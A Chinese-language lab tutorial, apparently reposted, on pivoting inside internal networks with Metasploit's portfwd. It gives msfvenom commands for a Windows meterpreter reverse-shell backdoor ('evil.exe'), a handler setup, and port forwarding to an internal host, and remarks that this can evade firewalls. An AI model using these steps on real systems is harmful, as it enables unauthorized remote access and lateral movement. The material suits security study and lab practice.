內網安全之:Metasploit 中的端口轉發與端口映射


------------恢復內容開始------------

>鄭重聲明: >本筆記編寫目的只用於安全知識提升,並與更多人共享安全知識,切勿使用筆記中的技術進行違法活動,利用筆記中的技術造成的后果與作者本人無關。倡導維護網絡安全人人有責,共同維護網絡文明和諧。

Metasploit portfwd 原理

  • portfwd 是借用 meterpreter shell 建立的連接進行數據傳輸,達到端口轉發的目的。
  • 當建立反向連接時,可以繞過防火牆的檢測。
meterpreter > portfwd --help
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:
-L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
-R        Indicates a reverse port forward.
-i <opt>  Index of the port forward entry to interact with (see the "list" command).
-l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
-p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
-r <opt>  Forward: remote host to connect to.

2 實驗環境

image-20210901115147825

2.1 建立 meterpreter 反向連接

  1. 生成 Metaspolit 后門程序

    msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe
    
  2. kali 配置監聽 meterpreter 反向連接

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.2
    run
    
  3. WEB Server 下載 Metaspolit 后門程序,並打開程序

  4. meterpreter 反向連接建立成功

    image-20210901115116102

2.2 portfwd 端口轉發

  1. 配置 portwd 端口轉發

    meterpreter > portfwd add -L 192.168.0.2 -l 18080 -p 80 -r 192.168.100.151
    
  2. 使用 portwd list 查看是否建立端口轉發連接

    image-20210901115352741

  3. 驗證:

    image-20210901115415588

2.3 portfwd 端口映射

  1. 配置 portwd 端口轉發

    meterpreter > portfwd add -l 12323 -p 23 -r 192.168.100.151
    
  2. 使用 portwd list 查看是否建立端口映射連接

    image-20210901115536582

  3. 驗證:

    ┌──(kali㉿kali)-[~]
    └─$ ssh -p 12323 root@127.0.0.1
    

    image-20210901115626879

------------恢復內容結束------------


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM